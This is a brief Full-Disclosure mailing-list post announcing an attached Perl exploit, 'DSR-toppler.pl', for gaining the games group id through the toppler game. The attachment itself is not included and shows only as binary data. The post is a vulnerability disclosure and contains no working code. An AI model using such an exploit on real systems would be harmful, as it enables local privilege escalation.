Jan-28-2000 01:45:14 last message repeated
[Full-Disclosure] gid games via toppler
Attached file should be self-explainatory. -- kokanin/dtors/knud DSR-toppler.pl Description: Binary data
